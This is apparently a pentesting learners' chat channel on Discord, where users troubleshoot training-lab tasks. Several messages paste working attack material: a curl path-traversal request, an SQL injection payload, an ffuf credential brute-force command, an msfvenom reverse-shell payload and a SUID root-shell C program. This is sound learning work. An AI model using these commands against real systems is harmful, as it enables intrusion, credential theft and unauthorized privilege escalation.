#junior-pentester-path

after you have done #pre-security-legacy-path and #974406074444685322 yes

hey @sage current how are you doing tonight?

Maybe there are certain tasks in which browser dev tools won't work in which you gotta use burpsuite. There are other ways but ....

Problem is, that burpsuite gets introduced AFTER the Intro to Web Hacking on the Jr Penetration Tester Path, while the File Inclusion room is part of the Intro to Web Hacking.

So you haven't learn burp suite module yet ??

Correct

And you also want to follow it in order right ?? 🤠

I assume thats how you complete the paths. Thats how it was for Pre-Security Pathway and Intro To Cyber Sec Pathway aaand everything before File Inclusion :p

Damn 👽

Okay I think you should learn burpsuite

Thats not the point, wanna know if there is any way to solve it without burpsuite.

You will learn other ways in file inclusion room at the end maybe ??

I see you have completed the file inclusion room so must know the other ways. Right ?? The challenge you completed at the end of file inclusion room

The curl one

Thats the end. And no, other ways wouldn't be more sophisticated. There is a way using curl aka

curl -X http://IPHERE/challenges/chall3.php -d 'method=POST&file=../../../../etc/flag3%00' --output -``` 

which works perfectly fine, but I wanna know if there is a way on which the whole room has built on (how it was for the other tasks)

Sir, this literally depend on the method you are trying to perform maybe. If you're still confused community mentors are there :)

Thats why I asked in the first place my friend. What ways there are besides burpsuite with only the knowledge learned up to that room.

No worries sir, looks like I was wrong :)

No worries, thats why Im waiting for a response from a Mentor 🙂

@steel nymph sorry to tag bro needs help

Lassi is a volunteer, please don't ping anyone like that

Mb. Won't do it again. I also wanted to know about the answer that's why i pinged them

I understand, its ok. Just for next time 😁

Won't be a reason for a complaint :)

I'm having an issue with burp suite task 13. When I access the page normally it loads instantly but if I go through burp suite browser or foxy proxy it just loads forever. Any ideas?

Because maybe you have captured the request and you have to forward it. Then the page will load

Great call thank you

Gave +1 Rep to @deft rain

no need to thank buddy 😄

Gave +1 Rep to @somber raft

Anyone agree with reading walk through and get idea of task and do it again. Methodologies?

Hi all! I have a question relating to the File Inclusion room. I've managed to get to the challenge section, and I am stuck at the first flag. I understand that I have to change the GET request to a POST request to get the flag. I've tried in the browser tools to "Edit and Resend", but I dont feel like it is working.

I've also tried to open Burp, but as I haven't yet gone through the Burp room I dont know how to use it really, but I also do get an error message when trying to "Open browser" through Burp.

Had the same issue, I believe thats a firefox issue. For Challenge 1 you can edit the source code from GET to POST for the form

I've opened the web developer tools and used the network tab to catch and look at the requests comming in when I type something in the form in challenge 1.

I then grabbed the GET request with my information, Right clicked and choose "Edit and Resend". Changed the method to POST and clicked "Send". But I don't see anything changing.

Alright, I managed to get the flag by editing the source code. So I guess I made it! I'll have to look into the Burp suite when I get to that room 🙂 Thank you 🙂

Gave +1 Rep to @steel nymph

Yeah, I do get a wierd error message when trying to open the Burp browser, but maybe it is because I haven't set it up correctly

Wow.. that is exactly what I needed someone to tell me xD

Thank you, Burp suite works for me now 😄

🤔

Hmm. Looks like i didn't misunderstood anything atm 😫

+rep @steel nymph

Gave +1 Rep to @steel nymph

Why did you take orders from Shepherd, you should have had stayed with 141..

Soldier, orders are orders. Also wanted to clean that mess me and shepherd created while transporting those missiles. So... but don't you know I'm the whole 141 alone ?? 😎

I think #general would be best for us to talk this haha. This channel is dedicated to a pathway 🤠

you're right, my bad. Will keep that in mind from now on.

No worries. I'm not a mod just saving us from getting warned 😉

hi guys i got a problem in the windows privilege escalation room.....in the task six (Abusing dangerous privileges) i couldn't access the target machine......is there any suggestions ?

Did you start the new target machine that's attached to task 6 ?

of course but nothing happens

What's the title in the active machine information box ?

wprivesc2_v1.1

Can I have the target machine IP and try myself?

10.10.51.236

Seems to work fine, what creds are you using?

i am using the attack box and rdesktop command to access it

Ok, but what credentials are you using to rdp in?

Ok, so what's the error you get?
Since I just tried it and it seems to work fine

Might want to show me a screenshot of the error

the certificate is not valid

Mh

Might want to try it with remmina

I think that's on the attackbox too

i just turned off the attack box .....wait me to restart it

i will try it right now

it works fine with remmina

thank you both guys

@steel nymph @shadow echo

ok i'm stuck on Authentication Bypass with the brute force. I created the valid_usernames.txt file and populated it. I ran the code which it says has 0 Errors but I don't see the username/password combination? I've attached a screenshot of my output:

ok i couldn't include a screenshot?

you have to verify first CoralWolf ( to post images etc )

!docs verify

follow the instructions in that link ^ 🙂

whoopsie

sorry bout that

not a problem!

It's not verifying?

nevermind verified the wrong bot LOL

so back to my question @midnight maple

can you help me?

Screenshot please

one sec 🙂

this is the output in my question

am i reading it wrong @stark turtle (by the way love the name)

one sec

Thanks again @steel nymph

Gave +1 Rep to @steel nymph

Thanks @stark turtle

one sec

root@ip-10-10-229-174:~/Desktop# cat -A valid_usernames.txt
simon$
steve $
robert$

ya have a lil space there @ steve. I believe that could be it

yep

omg.

seriously?

very likely :d

Thanks again you two

small fau paux

happens to the best

Gave +1 Rep to @stark turtle

YES! got the answer

thanks again

Ayyy, lets go!

I hope to be as good as you two some day!

U dont wanna be as good as me. Trust me Because then you would be bad

Lol I don't believe it

That task fucked me over too haha dw

I have a question. I'm taking notes on everything. Does it come with repetition and time? I'm trying to remember it all.

You should always take notes. You will adapt what and how you note, but it's always a good idea to keep track of important information

@hazy kraken thanks I was mistakenly trying to remember it all as I'm going thru the Authentication Module you know?

Gave +1 Rep to @hazy kraken

I'm facing Problem in Task 5 Privilege Escalation : Kernel Exploits, First it wasn't let me download exploit file ('.c ' formate) in target machine, But i've done it in different location /run/user/1001

but now it doesn't let me execute exploit even i've execute permissions.

Don't do it in that location then? /tmp is usualky writeable and executable. /run is probably mounted with execute disabled

Ohh so will it work if i download in /tmp ?

Thank you @idle bison for your help, I got the flag 👍🏻

Gave +1 Rep to @idle bison

/tmp and /dev/shm are common places for doing that sort of thing

Is it apply for every machine ?

Linux Privilege Escalation Task 11, I am not able to mount my NFS folder. I use the command "sudo mount -o rw 10.10.24.79:/home/ubuntu/sharedfolder /tmp/sharedfolder " What am I doing wrong?

i'm facing an issue in file inclusion lab 1? I'm not understanding the instruction on it. Can someone elaborate a bit

Highlight which bit you don't understand and ill try to help.

Give Lab #1 a try to read /etc/passwd. What would the request URI be?
I used the lab 1 and can read the etc/passwd file but i don't get the URL for it?

I get your using php to find an open directory to the file you want, but i'm not understanding the request URL part of it.

Ahh, look at the url you crafted

Thats the request url

Start after 'http://xx.xx.xxx.xxx/'

http://webapp.thm/index?

I have it!!

got it!

There you go laddy

Good job @modest arch

thanks

hey @grave cape i have a question about file inclusion can you simplify it a bit

Sure shoot @modest arch

well i'm on lab3 and i'm backtracking a bit trying to understand the substitution of the nullByte. it's telling me to not trust the user input form and what i came up with is lab3.php?file=/././././etc/passwd.php

can i DM you @grave cape? I don't want to "give away" answers to the @tiny bluff stuff in open chat?

Sure go for it

The hint just means enter your payload into the browser search bar instead of the input fields

oh well i was tryin to solve without the hint but thanks! Also are you a pen tester out in the world?

Nope haha learning myself 😃

Also no shame in using the hints they are there to help

true. I'm torn between pen testing and soc analyst.

Going pentester myself

I'm not able to get reverse shell using cronjob as privilege escalation

Modified scripts which are already there even Created deleted one, but not able to get reverse shell can anyone help ?

Okay I got it now it need little patience.

It is a CRON job after all 😄

I always give two passes of the timer before I panic.

In Task 11: NFS Privilege Escalation I got error

$ ./nfs
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)

-rwsr-sr-x 1 root root 16056 Dec 2 06:25 nfs

permissions on it

and code

#include <stdio.h>
#include <stdlib.h>
int main()
{ setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}

what am I missing ?

Got the same issue.

have you done any thing different from this ?

Use static option while compiling

don't get it can you elaborate ?

Like right now I'm using

gcc nfs.c -o nfs -w

what should i've to change

Still got GLIBC error

#room-bugs message

Thank you for your help I've got the flags and all answers

+rep @shadow echo

Gave +1 Rep to @shadow echo

I’ve completed the path 🎉

Congrats @teal vortex - what's your next move?

when doing the bruteforce username enumeration with ffuf - is it possible to pipe out a clean username list?

Going for Offensive Pentesting path

How long did you wait? For me it is taking ages and still nothing....

Check the permissions on it

Make sure it's executable

Evening, fellow pen testers

How could I forget something so basic... Thanks for that!

Gave +1 Rep to @idle bison

If you waited for one minute and still not get shell then restart listener and try again it will gives you shell in a minute or two

I forgot to set it as executable :/ Afterwards it worked as intended

SQL Injection Task 8 - there are 2 columns in the users table - i have found the username column - but i cannot find the 2nd column name for the life of me. i have tried a-z, 0-9 and - [underscore]

it doesn't seem to begin with - or [underscore] . however i have noticed that the '_' seems to act like a letter substitute, because { column_name like '_s__nam%';--} returns true - is this normal

i know what the other column is, i just don't understand why it's not returning true

Yeah it is normal nothing wrong in that

What you're trying ?? can you share with us ??

I managed to pass it last night knowing it was a user table and I was attempting to get credentials… I had a good idea of what the 2 columns were 😎 I believe the string was something along the lines of || admin123’ UNION SELECT sleep(1),2 FROM information_schema.columns WHERE table_name = ‘sqli_four’ AND column_name = ‘username’ AND column_name LIKE ‘pas%’;— ||
This was returning false.

If I have written that correctly I’m very happy with myself as I have just woken up and not had coffee yet, and managed to recall that from memory hahaha

Okay, noted - would you search for table and column names that prefix with and underscore differently in that case?

which prefix ??

Unrelated to the task, just an additional question. I mean when trying to reveal table names in a scheme for example. how would you know that a table does in fact start with an underscore or whether it’s just substituting another letter.

start with an alphabet then underscore or percent whatever you think is necessary (if you have some idea about the table) then go on

Passive Reconnaissance Room - Task 6 - Q1 needs the answer updating as shodan now shows ireland for both:

Not sure what it used to be, but i can't 100% this room 😄

managed to guess it || Germany || if anyone else needs to pass the room until its updated 🙂

shows it correctly for me

Q2 - asks for the 3rd most common port for Apache. Shodan.io only lists 2 and its an nginx server....am i missing something here?

nvm, question 1, 2 & 3 wants you to search 'Apache' and 'Nginx' on Shodan.io - i misunderstood and thought it was expecting you to get the answers from a search report of tryhackme.com

My metasploit run on msf5 while the course uses msf6

When i run it says auxiliary failed

Using auxiliary/scanner/netbios/nbname
msf5 auxiliary(scanner/netbios/nbname) > run
] Auxiliary failed: Msf: :OptionValidateError One or more options failed to validate: RHOSTS

What do i do?

Can you verify yourself and share a screenshot of the options you have set for the exploit ??

!docs verify

not this the screenshot of the show options command

the show option for the netbios/nbname ?

yepp the exploit

you have to set RHOSTS (Remote Host) value

set it to what?

ohh i get now

on what you're trying to use that exploit ??

the target machine

but on the learning material they do not set it any where.....how do i set it?

which room is it ?? can you share the link for the room ??

https://tryhackme.com/room/metasploitexploitation

task no ??

under scanning

im just tryna do what was done there before i get to the excersises

They haven't done there anything with the exploit you're using firstly 🙂

the exploit here and the one you're using are different

i wana do this. but how do i set the rhost or the port number

they do

for an exercise

you just said before exercise

Okay do you have the machine attached to the task started ??

yeah

you have the IP address of it ??

yes

okay set that IP address in RHOSTS field

howw??

with set command

set RHOSTS [ip address]

thanks done

@timid compass ⬆️

they spammed it into basicly every channel... think it is something weird with it

Am I missing something here? That's clearly the correct URI.

Do you have burpsuite on ??

No

Check if you extra space before or after the answer

hello guys. i have an issue. my attackbox is pretty slow. i seem to get stuck all day. i would rather prefer to use my local kali machine. i have tried downloading some files from the attackbox, but it seems to not go through. i want to ask if there is a way to download files, such as wordlists from the attackbox to my kali ?

Which wordlist you want ??

Connext using openvpn

Do python3 -m http.server

On the direcotry with the list

Then wget http:atackboxio:port/list.txt

hey guys ,im new to this server. ive been learning python since a long time and can i get a idea so something that i can do using python

hey guys

im working on the metersploit lab

msfvenom

i did everything right

but i do not get a meterpreter

anyone know whats wrong?

hi guys neeeed you here....... in the windows privilege escalation room in task 6 when used impacket this msg popped up

I did a little more digging after a night of sleep and just as I suspected, the answer it accepted is NOT the correct answer for exploiting the LFI.

Not sure if there's a place to report issues like this, so I'll leave this here for anyone else who runs into the same thing.

What is the answer it accepted ??

You already have a meterpreter shell. Look into sessions

Do you have the hives on the machine ??

The accepted answer is the absolute file path. The actual exploit needs some ../ in front of it.

It's in the screenshot

Yeah mb I just saw the answer in the screenshot

Haha no worries

There is no issue with the room. Your answer was wrong maybe 😄

@gentle hull

No, the accepted answer is wrong

Look at my other screenshot

You entered wrong value in the form sir

Well this has been productive

Yes. I entered the wrong value and the platform accepted it as the correct answer. That is what I am saying.

The platform does not accept the actual correct answer

The question is asking to enter URI so the answer is correct

No, you have to traverse directories to access the file. Without the directory traversal, the URI points to nothing because the file doesn't exist in the directory that the PHP file is in

The lab1 doesn't require traversing maybe

It does though, that's the whole point. I have to do work now, hope this conversation was helpful for others.

Nope it doesn't

Can you share a screenshot of just /etc/passwd in the form ??

how

once i click anything it terminates the session

The meterpreter session ?? Share a screenshot

i dont know why it doesnt automatically gives me a meterpreter

You pressed ctrl+c that's why it closed the session

There ya go 🙂

It doesn't require traversal

I didnt

I just typed c there

can you retry it again ?? and share a screenshot of the results here

Once i run the script on the victim machine it gives me this

Then does nothing else

now do as i say

Okay

enter a command sessions

what did you get ??

@elfin geyser

Hello everyone. Am Solomon.

For some reason, I don't know why my thm Virtual machine refuses to start. It all started today. Am participating in the advent of Cyber 2022 game

Hello solomon. What is happening ?? can you share some screenshots ??

i have

what do i do?

Wait you already have a shell but not the meterpreter one

maybe I'm wrong can you please share a screenshot without editing ??

editing what?

there is no edit there

the screeshot

once i type anything it ends

which task ?? in the meterpreter room ??

in the metasploit:exploitation room

okay task no ??

task 6

last question

Did you make a msfvenom payload ??

sure

this is on murphy terminal using ssh

im running the scripts i transferred via python server

can you show me the command for making the payload ??

yeah

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=1234 -f elf > re_shell.elf

thats the payload

@elfin geyser can you share screen ??

Okay maybe later

My laptop battery is low now

In 2 hrs id be charged up back

is there any functionality behind the 'Script Kiddie" output file format for Nmap or is it kind of an inside joke that went to far? 😄

feels like its only there for trolling purposes 😄

i am completely stuck on bruteforcing with ffuf

im not sure how to adjust the code to get the output of the username and password

ive tried adjusting W1 with the usernames i found but it errors out

@ember wave did you end up figuring itout?

nope still very stuck

Paste the error you are getting and someone may be able to assist

Which room and task number? I’ll take a look if you want another set of eyes 😎

I believe its Intro to web hacking authentication bypass task 4

finished that section earlier today

wait no thats task 3

if you send me a DM with what you have tried and i will give you some pointers of what you may need to adjust 🙂

thanks for directions, yes, task 3 - bruteforcing

Gave +1 Rep to @night surge

One thing to check is the path you are using to the wordslist. The path is CaSE SensTIVe, and so will cause it to error out if you have missed some capitalization. It kept getting me for about 15-20 minutes, i was so frustrated 😄 - turned out, i had missed the the capital L in /SecLists/

Also for your usernames txt file - make sure your usernames are on a new line each, not a comma/space separated list. eg:

your valid_usernames.txt [or whatever you decided to call it] should look like -

name1
name2
name3

And not like -

name1,name2,name3
OR
name1 name2 name3

W1 is being used as a variable and will run on each line of the document you pass it, so if you have them in a comma/space separated list, then what the code will POST to the server would like:

username=name1,name2,name3
OR
username=name1 name2 name3

Instead of:
username=name1
username=name2
username=name3

obviously replacing my examples 'name1','name2', 'name3' with the usernames found in Task 2

Hydra related Question - is it possible to instruct Hydra to process a list in reverse [Bottom > Top] rather than [Top > Bottom]?

My thinking is it could speed up the process with files like rockyou.txt. This way i could run in 2 separate tabs one starting the list from the top and the other starting from the bottom - meeting in the middle, this would half the process time

Why not just reverse the wordlist?
And no, it wouldn't half the process time any more than just running twice the number of threads as that's what you're doing.

NetSec Challenge room:
added the two users to users.txt and set password list to rockyou.txt with 64 threads running - and the VM almost timed out before it has finished processing - reckons it has 125hrs to process the full list

Perhaps you're doing something wrong.

The room review rules for tryhackme includes a 5 minute limit on brute force.

oh my days - adding the users to a user list was a mistake!!!

thanks @idle bison for making me re-assess and not sit here like a melon for hours hahaha

Gave +1 Rep to @idle bison

Remember the 5 minute rule

do you know why using a user list with 2 users take considerably longer than running them individually?

Well it'll take at least twice as long

hey guys

im confused on what to do from here as i do not have a meterpreter

Did you set your payload in the handler?

yeah

u see that it connects

but doesnt give a meterpreter session

Only if it connects, doesn't mean you set the correct payload in your multi/handler

Might want to show a screenshot of your options

i do not understand

Show your options of the handler pls

i already set the LPORT AND LHOST

Ye, but you can also set the payload

So show a screenshot please and we can go from there

the payload is reverse_sh.elf

well defining the username with '-l name1' and then running again for '-l name2' took about 10 seconds each to run. but running '-l users.txt' was running for well over 30 minutes before i asked my original question in here

You're going to kick yourself

oh wait

because it will run the full passwords list on the first user and then do the second - 5 minute rule!

No

-L is used for a username list

https://tenor.com/view/pissed-off-rage-angry-gif-16632216

hahaha

You were using the literal string "users.txt" as the username

i get you, thank you - seething now 😄

i need to get some flashcards made. nmap module just before it was a flag overload, my heads floating with them.

so i edited my word file to look like this

|| i did the code like this: ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=admin,robert,simon,steve&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.56.92/customers/login -fc 200 ||

still not getting any output with the password

||-d "username=admin,robert,simon,steve&password=W2"|| is where you went wrong

remember W1 is acting as a variable the same as W2 is acting as a variable for your password list

put your code between | | | | so that it makes it a spoiler tag and doesn't ruin the fun for others not that far 🙂

ok im tracking so with those acting as variables and reading the file correctly as it does when i use the original text from the guide where does the output post to? because when i leave it alone it reads it without error how do i get it to output something. I think thats the part my brain is lagging on

it should output a result straight into the terminal, it does not go into a file or anything

this it the output when leaving it alone: || ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.56.92/customers/login -fc 200
||

so i assumed i had done something wrong

share your updated code 🙂

|| ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.56.92/customers/login -fc 200 ||

looks correct from memory. im in the middle of a room at the minute. try removing admin from the users list and re-running your code

smh nope still same output no username or password shown. This is the weirdest thing lol and thank you for the help. I can wait till your free if youd like

im getting a 502 server error from THM now 😄

just had a check, and it all looks correct. I even started a machine and ran your code and it worked - try a hard refresh on your page and try your code again

CMD+SHIFT+R [mac], CTRL+SHIFT+F5[Win - i think]

i also ran your code with your VM IP and it worked too, so your VM is still up for definite

huh odd ok im refreshing the page now

no luck did a hard refresh and even terminated the machine and started over

well ill be. Figured it out. I created a new doc with the username info and it worked smh

thanks a lot for all the help

no problem 🙂

You have to tell multi/handler what type of payload you generated, especially for staged payloads.
You do this with the set command like setting lhost and lport.

guys, please help. I am currently learning metasploit. ran into a problem with the reverse shell generated by msfvenom

Most likely your msfvenom and multi/handler payloads not matching

ty sir

Gave +1 Rep to @shadow echo

Can u explain further?

Hey did u fix it? Im having same error

Not really

But it's the same problem in both cases

My payload match

Show us.

Screenshot please.

Screenshot of what?

yes, i changed payload

Hmm mine does not work

What screenshot u wanna see?

run show options

maybe trouble with port or host

No, it's not that

this is the show options

my attacker ip and a port i gave it

what did u change it to?

linux/x86/meterpreter/reverse_tcp

wrong payload

how do i change it?

set payload linux/x86/meterpreter/reverse_tcp

Hi all new here, I would like some help i am on task 12 content discovery and im being asked to target the acme it support page, so ive got onto the attackbox, tried all these different automation tools (making sure to change the MACHINE_IP to my attackbox ip). My issue is i cant find this acme support page that im supposedly having to target. Thanks

MACHINE_IP is a variable on the page that switches to the target machines IP once it’s booted. Did you start the target machine as well as the attack box?

The target machine will be In the accordion tab with the green icon

my attackbox hangs alot

and its damn slow

anyone know how to make this better?

The attackboxes have limited resources so they have limited performance. Use a lighter browser if you're ready to see a bit of difference

im using safari

is chrome better?

Nope

Better keep using safari. Enable hardware acceleration if it has.

this one has me scratching my noggin':
Metasploit | Exploitation - Task 5
anyone offer a nudge in the right direction?

how do i know how many days is left on my subscription?

ill trythat thank you

Gave +1 Rep to @deft rain

https://tryhackme.com/profile

You got the hashes or not ?!

no, i cant even see a user 'pirate' 😄

is it refering to the same smb server

Wait lemme check. I did that room long time ago

cheers 🙂

You tried looking at the hint ??

You got the meterpreter shell right ??

yes and yes. i used hash dump on the session and only got a administator hash i think.

it was a few hours ago, i will need to start from the beginning as i had a meeting at work 😄

No worries ping me if you face it again.

thanks @deft rain - im booting the machines back up now. to take another run through

Gave +1 Rep to @deft rain

@deft rain i'm at a loss again 😄 - i arrived at the same place and unsure of what to do next - whether theres another step or i need to go back and try another step instead

my only guess would be || exit current connection to smb and try and connect as Administrator using the stolen hash||

do you have your machine up rn ?? i'll fire my kali to check it

yeah

okay gimme ip

in your DM

appreciate the help

Thanks @deft rain got there in the end. Thank you again for your time and guidance 🙂

Gave +1 Rep to @deft rain

No need to thank mate

Gave +1 Rep to @tame estuary

Metasploit DB Usage Practice | No spoilers - just attempting some additional learning.

I wanted to have a play with msfdb in the attack box before i progress further.

$systemctl start postgresql
Then, when trying $msfdb init, it insists running as a non-root user.
Okay, fine
$su ubuntu
$msdb init

This then asks for a user and password for msf web service. i use root:root as something easy to remember.
It then attempts to start the msf web service - and then errors out.

does it only behave this way in the attack box or have i fluffed something up? in the task write up, they run everything as root without errors.

nvm - i'm a tool sometimes 😄 Looks like it is just attack box behavior/limits - i'll go start a Kali box

Metasploit: Meterpreter - Task 5

Possibly another DOH! moment - I have found the secrets.txt and realsecret.txt files but the the task is not accepting the paths as the correct answers

it is asking for the path to the folder said files are in... i.e excluding the name of the file itself in the answer field

yep, DOH moment 😄

Thanks @sage current

Gave +1 Rep to @sage current

no problem

Metasploit rooms Complete 🙂 - that was ....Emotional.

thoroughly enjoyed them but one hell of a roller coaster

nice

one step closer to the cert of completion for this path then

yep 🙂 just booting up 'What the Shell?'

once i have finished the Jr Pentester Path, then i am going to redo the nmap rooms, as that was a lot to take in - and it didn't all go in ... at least it doesn't feel like it did i still dont fully understand all the scan modes

https://tenor.com/view/math-calculating-formulas-confused-little-girl-gif-19737617

Thank you so much I knew it'd be something silly I was finally able to finish the task!

Gave +1 Rep to @tame estuary

very welcome - i have had quite a few of those moments today if you look at the conversation in this room 😄 😄 😄

At the end of the ‘what the shell?’ Room, the last three tasks.
I think this format would work really well in every room. A bunch of extra optional scenarios and two different environments to practice in.

This is what I’ve been waiting for. 🥳 I like to have play at the end of a room and explore the new things I’ve learnt, but being new to the tool/concept taught in the room, I often find myself scratching my head not knowing enough to give myself my own scenario’s..

Are there more rooms that run in this format?

is there any experienced QA person that can recommend some certification to switch more to the cybersec (without loosing 50% of your salary 😅 ) ? I was thinking about CompTia Pentest certification.

You might be better off asking this in #cyber-and-careers 🙂

does being a QA lead me to a pentester path?

┌──(kali㉿kali)-[~]
└─$ cd Villain

┌──(kali㉿kali)-[~/Villain]
└─$ sudo python3 Villain.py

┬  ┬ ┬ ┬  ┬  ┌─┐ ┬ ┌┐┌
└┐┌┘ │ │  │  ├─┤ │ │││
 └┘  ┴ ┴─┘┴─┘┴ ┴ ┴ ┘└┘

 by t3l3machus

[Debug
] Core server failed to start. Port 65001 seems to be already in use.

┌──(kali㉿kali)-[~/Villain]

how can i debug this ?

65001 is already in use, use different port

it depents in my opinion. You can be a QA that can cover all parts of quality control - inclusive security. Or as QA you can at least get very strong fundamentals of backend, networking, DBs etc (depents what is your role / scope / company / project etc.)

thanks for the response @modest arch , im a fresh grad and i want to start a career in cybersecurity specifically in the field of pentesting but it seems to be companies are mostly hiring only with experience. thats why i asked for a lower tier role to get into that position. currently im learning online materials and studying

Gave +1 Rep to @glacial panther

┌──(kali㉿kali)-[~/Villain]
└─$ sudo python3 Villain.py
Traceback (most recent call last):
File "/home/kali/Villain/Villain.py", line 11, in <module>
from Core.common import *
File "/home/kali/Villain/Core/common.py", line 12, in <module>
from Crypto.Cipher import AES
ModuleNotFoundError: No module named 'Crypto'

┌──(kali㉿kali)-[~/Villain]
└─$

iam geting some error ?

@gaunt bolt is this related to content on this tryhackme learning path?

i dont no where to ask & am new to cybersec

#infosec-general please

@idle bison tq

I'm doing a little deeper dive into nmap before i finish off the Jr Pentester Path - i am referencing nmap.org here [ https://nmap.org/book/host-discovery-dns.html ]

Is it a common/standard practice IRL to utilise nmap's [ --dns-servers ] to speed up scan times and offer a little extra stealth? and also how much stealth and time savings does this generally this offer? (i know it's not really quantative, just curious as to whether its worth the extra effort)

It's not really more stealthy unless you're asking their DNS servers directly
It's faster because of parallelism, I've done it like once when I had a big list and I was trying to do just mass name resolution

okay, so more of a perfomance enhancer. can you pass [ --dns-servers ] an authorative_servers.txt list as an argument?

Doesn't look like it.

no problem 🙂 thanks @idle bison

Got myself a fresh notebook to sit and write all my notes down, it's genuinely helping. Just the handwriting that needs some work now :p

Gave +1 Rep to @idle bison

Hi need help with windows priviledge escalation, the payload has been sent over to the windows machine and I cannot find it on the system, the AV is off by default

It must be in the dir where you ran the command to get it

I had a look in the folders and the move command is not finding it in any dir

download it again in a known dir I think some dirs won't have perms for it

ok will attempt it tonight and try that

Hi Graves still having the same issue, tried writing to %temp% directory with the same issue

Linux Escalation | Task 7 - running task 7 machine

Karen has no sudo privileges at all - how do i progress. It's impossible to follow along with the task as the permissions don't allow you

nvm worked it out 🙂

Hi guys

I am new here

Okay do one thing. With which user you got foothold inside the Windows machine ??

Go to C:\Users\thm-unpriv and there try downloading the malware from your attacking machine

I have already gained access to svcuser1 and I have stated that I have tried the usual directory C:\Users\thm-unpriv . I also tried the C drive as well as the temp directory in App Data

I am using the attack box it displays that it has been transferred with 200 status what more can I do as I viewed each folder in the directory

Are you using curl ??

If yes then you have to use -o [output filename] in the command too

no I used the Simple httpserver with python module and on the victim pc used wget to transfer the file on to the pc

with powershell opened

can you verify yourself and share a screenshot ??

!docs verify

please see above error I get when trying to move the file across

below I mean

The error says it can't find the rev-svc2.exe there

Enter dir command to list files of that dir

I have looked everywhere on the directory

Nope. Use this command to get the file
curl http://ip:port/file -o rev-svc2.exe

ok works better with curl, thanks

should have just started with that curl command when you mentioned it, thanks again Graves

powershell wget is not wget. its just an alias for invoke-webrequest, the same as curl in powershell. You would need to -O filename for it to work

thank you

i think you can do [ Get-Alias -name "wget" ] & [ Get-Alias -name "curl" ] in powershell to confirm this

Hey! currently on Introduction to web hacking: Subdomain enumeration, on the last exercise of it "Virtual Hosts" the size I need doesn't come up when I follow all the steps in the attack box, so I've watched some video's and that way got the answer, I still want to do it myself but I have noticed that every single video I watched the person was using Kali Linux so I was wondering if I could just follow the entire course on Kali Linux using VMware

You can use kali linux as an attackbox just click on the arrow right side to the "Start Attackbox" button. And select kali linux from there

Also it doesn't matter. Kali won't give you answers that attackbox(ubuntu) didn't give

hey i wanna ask was the windows privilege escalation course rebranded recently?

why ??

rebranded???? no
remade??? yes it was polished up a bit with QA and made better by explaining all the methods more in depth and adding a few new ones

Okay thank you

Gave +1 Rep to @sage current

I noticed some differences since i did it last

Ohh okay

Afternoon! Need some assistance. Working on Linux Priv Escalation Task 9. I've identified the cronjob and injected my reverse shell into the file on the target system and started a NC listener on my attack box. However, Im not getting any callbacks on my own attackbox or the THM attackbox. Ive tried changing the port numbers in the inserted code/NC listener as well as terminating the target system and restarting it. Watched a few walkthroughs and Im doing exactly what theyre doing and still no callbacks. Any ideas??

Did you check the file permissions of the file that's holding your rev shell now ?

I love you. I didn't and I see exactly why it hasnt been running.

Welp here I am again -- Working on Linux Priv Escalation Task 11. I have my attack directory mounted to the target no_root_squash directory, created my binary, compiled my binary, set the SUID, and it runs on the target machine. However, the code provided in the lesson isn't escalating to root. I tested a dummy file (just prints "Hello, World!") and it runs just fine on the target box. I've even copied code used in a walkthrough (which is similar but different to the lesson provided code) and still nada. Any ideas??

Fixed -- I overlooked what user my binary was owned by when I created it.

Hello guys on Task 5 of Linux PrivEsc i can't wget the payload from my own kali attackbox on /Downloads/37292.c

any ideas to help please

when i do wget on target machine my attackbox responses with 404 file not found

Start the python server in the same directory as your file is

Then just use /37292.c

Thanks alot worked

Hey guys how can we specify a port with enum4linux, the ssh port is 2222 and I think enum4linux scan the 22 ( Basic pen testing)

enum4linux is for SMB/RPC, not SSH

Thank you for the answer, you know any tool for ssh enumeration ?

Gave +1 Rep to @idle bison

No.
I can tell you for a fact that enumerating SSH is barking up the wrong tree so to speak.

what will be best path to pentester career ? (junior pt-->offensive pt---> web fundamentals ? )

#pre-security-legacy-path
#974406074444685322
#junior-pentester-path
#web-fundamentals-path
#offensive-pentesting-path

then after that maybe
#red-teaming-path

I'm starting to feel a real bond with the folks at ACME IT Support! Almost feeling sad for them and their super insecure website 😄

they have a website like we all would have coded it 10-15 years ago 😆

Long long time ago I created a quizz website in php and I shared the url online. Few days after, someone used an SQL injection to put themself at the top score 🙂

ty alot

Gave +1 Rep to @sage current

heyy, I'm having some trouble with the burp suite basics room, on task 14

instead of getting the alert I get this 'invalid parameters' thing and I don't really know what I could be doing wrong :/

did you use ctrl+u to decode?

yes

you have to forward your input

Don't turn off the intercept

well it just suddenly worked now... and the attack machine just stopped working immediately after haha

but I also did that, this was my millionth try

guess it was just a buggy thing?

thank you either way 🙂

i have to say it, then it works xD

i was showing the issue to my fiance after your answer and suddenly it worked hahaha i think the universe is just against me

right now? - yes 😛

cant seem to wget on linux privescalation room

im not to sure whats happening but i just keep getting 404 file not found

Hi, I'm trying to rdp into a tryhackme windows machine from my own kali linux (not attackbox). I've tried rdesktop to the IP but receive error. How do I do this?

Can you share a screenshot ??

Start your webserver in the directory where file the file is stored, that you are downloading

is nc not installed on the what the shell windows pc? I keep getting a 'nc' is not recognized error.

Navigate to C:/tools directory. You'll find netcat there

ok

Hi People! a pretty general question: On a Linux machine, i am logged in as a pretty low privileged User... I can barely write(create a file in a Directory) or look in a file(But i could traverse through almost all directory). But after i traversed in a lot of directories and tried, i finally found a directory, in which i could create a file.(it was /tmp). But is there any other method i can see if i can write in a curtain directory without trying it all the time? I could think about the approach with 'ls -l' but im not pretty sure

ls -la then it will include . and ..

Alright. Thx. But the approach with ls -l (and -al as yu kindly suggested) is in right direction i guess?

That's one way

